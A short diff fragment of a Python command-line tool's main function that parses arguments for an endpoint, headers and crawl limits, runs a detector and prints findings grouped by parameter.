parser.add_argument("--max-items", type=int, default=10, help="Max items per list to inspect when extracting values (default: 10)") + parser.add_argument("--crawl-delay", type=float, default=0.0, help="Delay in seconds between crawl requests (default: 0.0)") + parser.add_argument("--verbose", action="store_true", 
help="Print queries and debug information") + args = parser.parse_args() + + headers = try_parse_headers(args.headers) + findings = run_detector(args.endpoint, headers, crawl=args.crawl, crawl_depth=args.crawl_depth, + max_requests=args.max_requests, max_items=args.max_items, + crawl_delay=args.crawl_delay, verbose=args.verbose) + + grouped = group_findings_by_param(findings, args.endpoint) + print_grouped_summary(grouped) + +if __name__ == "__main__": + main()